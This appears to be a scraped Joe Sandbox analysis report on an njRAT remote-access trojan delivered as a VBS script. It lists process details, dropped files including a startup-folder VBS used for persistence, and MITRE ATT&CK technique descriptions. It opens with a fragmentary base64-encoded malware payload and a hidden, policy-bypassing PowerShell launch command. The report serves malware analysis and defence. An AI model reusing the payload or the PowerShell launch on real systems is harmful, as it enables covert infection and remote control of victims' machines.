0U3lzdGVtLldlYi5TZXJ2aWNlcy5Qcm90b2NvbHMuU29hcEh0dHBDbGllbnRQcm90b2NvbBJDcmVhdGVfX0luc3RhbmNlX18TRGlzcG9zZV9fSW5zdGFuY2VfXw?? ?? ?? B?? B?? ?? tNeS5Db21wdXRlcg?? ?? EwE?? Dk15LkFwcGxpY2F0aW9u?? ?? ?? M?? Q?? HTXkuVXNlcg?? ?? EwE?? Dk15LldlYlNlcnZpY2Vz?? ?? ?? Q?? Q?? LTXkuU2V0dGluZ3M?? ?? ?? C0?? ?? ?? ?? zsrvvgE?? ?? ?? CR?? ?? ?? ?? bFN5c3RlbS5SZXNvdXJjZXMuUmVzb3VyY2VSZWFkZXIsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLj?? sIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZT?? 4OSNTeXN0ZW0uUmVzb3VyY2VzLlJ1bnRpbWVSZXNvdXJjZVNld?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? FBBRFBBRFC0?? ?? ?? ?? ?? ?? ?? ?? ?? H6xN+k?? ?? ?? ?? ?? ?? g?? ?? ?? Gk?? ?? ?? BEOQ?? ?? RBs?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? BSU0RTz7YbjMR2n0y4xJgHLeBcd?? E?? ?? ?? BEOlxIYWNraW5nXENyeXB0ZXJzIE1vZGRpbmdcQ2xhc3NMaWJyYXJ5M1xDbGFzc0xpYnJhcnkzXG9ialxSZWxlYXNlXGxwT1VwbE1wLnBkYgDVOQ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DvOQ?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 4Tk?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? BfQ29yRGxsTWFpbgBtc2NvcmVlLmRsb?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? /yU?? I?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? B?? ?? ?? ?? ?? Y?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? E?? ?? ?? ?? w?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? BI?? ?? ?? ?? WE?? ?? ?? DwD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DwDN?? ?? ?? ?? FY?? UwBf?? FY?? RQBS?? FM?? SQBP?? E4?? XwBJ?? E4?? RgBP?? ?? ?? ?? ?? ?? C9BO/+?? ?? ?? B?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? /?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? R?? ?? ?? ?? ?? E?? VgBh?? HI?? RgBp?? Gw?? ZQBJ?? G4?? ZgBv?? ?? ?? ?? ?? ?? ?? k?? ?? Q?? ?? ?? BU?? HI?? YQBu?? HM?? b?? Bh?? HQ?? aQBv?? G4?? ?? ?? ?? ?? ?? ?? ?? ?? s?? Sc?? g?? ?? ?? QBT?? HQ?? cgBp?? G4?? ZwBG?? Gk?? b?? Bl?? Ek?? bgBm?? G8?? ?? ?? B4?? g?? ?? ?? Q?? w?? D?? ?? M?? ?? w?? D?? ?? N?? Bi?? D?? ?? ?? ?? ?? q?? ?? k?? ?? QBD?? G8?? bQBt?? GU?? bgB0?? HM?? ?? ?? Bs?? H?? ?? TwBV?? H?? ?? b?? BN?? H?? ?? ?? ?? ?? ?? ?? DI?? CQ?? B?? EM?? bwBt?? H?? ?? YQBu?? Hk?? TgBh?? G0?? ZQ?? ?? ?? ?? ?? ?? b?? Bw?? E8?? VQBw?? Gw?? TQBw?? ?? ?? ?? ?? ?? ?? 6?? ?? k?? ?? QBG?? Gk?? b?? Bl?? EQ?? ZQBz?? GM?? cgBp?? H?? ?? d?? Bp?? G8?? bg?? ?? ?? ?? ?? ?? b?? Bw?? E8?? VQBw?? Gw?? TQBw?? ?? ?? ?? ?? ?? ?? w?? ?? g?? ?? QBG?? Gk?? b?? Bl?? FY?? ZQBy?? HM?? aQBv?? G4?? ?? ?? ?? ?? ?? DE?? Lg?? w?? C4?? M?? ?? u?? D?? ?? ?? ?? ?? 6?? ?? 0?? ?? QBJ?? G4?? d?? Bl?? HI?? bgBh?? Gw?? TgBh?? G0?? ZQ?? ?? ?? Gw?? c?? BP?? FU?? c?? Bs?? E0?? c?? ?? u?? GQ?? b?? Bs?? ?? ?? ?? ?? ?? BI?? BI?? ?? QBM?? GU?? ZwBh?? Gw?? QwBv?? H?? ?? eQBy?? Gk?? ZwBo?? HQ?? ?? ?? BD?? G8?? c?? B5?? HI?? aQBn?? Gg?? d?? ?? g?? Kk?? I?? ?? g?? DI?? M?? ?? y?? DI?? ?? ?? ?? q?? ?? E?? ?? QBM?? GU?? ZwBh?? Gw?? V?? By?? GE?? Z?? Bl?? G0?? YQBy?? Gs?? cw?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EI?? DQ?? B?? E8?? cgBp?? Gc?? aQBu?? GE?? b?? BG?? Gk?? b?? Bl?? G4?? YQBt?? GU?? ?? ?? Bs?? H?? ?? TwBV?? H?? ?? b?? BN?? H?? ?? LgBk?? Gw?? b?? ?? ?? ?? ?? ?? ?? Mg?? J?? ?? E?? U?? By?? G8?? Z?? B1?? GM?? d?? BO?? GE?? bQBl?? ?? ?? ?? ?? ?? Bs?? H?? ?? TwBV?? H?? ?? b?? BN?? H?? ?? ?? ?? ?? ?? ?? DQ?? C?? ?? B?? F?? ?? cgBv?? GQ?? dQBj?? HQ?? VgBl?? HI?? cwBp?? G8?? bg?? ?? ?? DE?? Lg?? w?? C4?? M?? ?? u?? D?? ?? ?? ?? ?? 4?? ?? g?? ?? QBB?? HM?? cwBl?? G0?? YgBs?? Hk?? I?? BW?? GU?? cgBz?? Gk?? bwBu?? ?? ?? ?? MQ?? u?? D?? ?? Lg?? w?? C4?? M?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? w?? ?? ?? M?? ?? ?? ?? BDo?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
Imagebase:	0x7ff777fc0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exePID: 7128, Parent PID: 5872

General

Target ID:	29
Start time:	06:50:05
Start date:	21/02/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x2d0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Disassembly

⊘No disassembly

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report NJratccccassssG2.00.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Njrat

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_czz05exg.e0h.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jv2klgm1.r0q.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lpv40imj.k0g.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_phjaxqgs.pd0.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tq5avew2.ytq.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v0iy51oe.tqh.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vfpndanb.rnb.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wdyg2daj.ovs.psm1

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs:Zone.Identifier

C:\Users\user\Documents\20220221\PowerShell_transcript.347688.9YlVrO_k.20220221064925.txt

C:\Users\user\Documents\20220221\PowerShell_transcript.347688.IrFEJQAh.20220221064918.txt

Windows Analysis Report
NJratccccassssG2.00.vbs

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre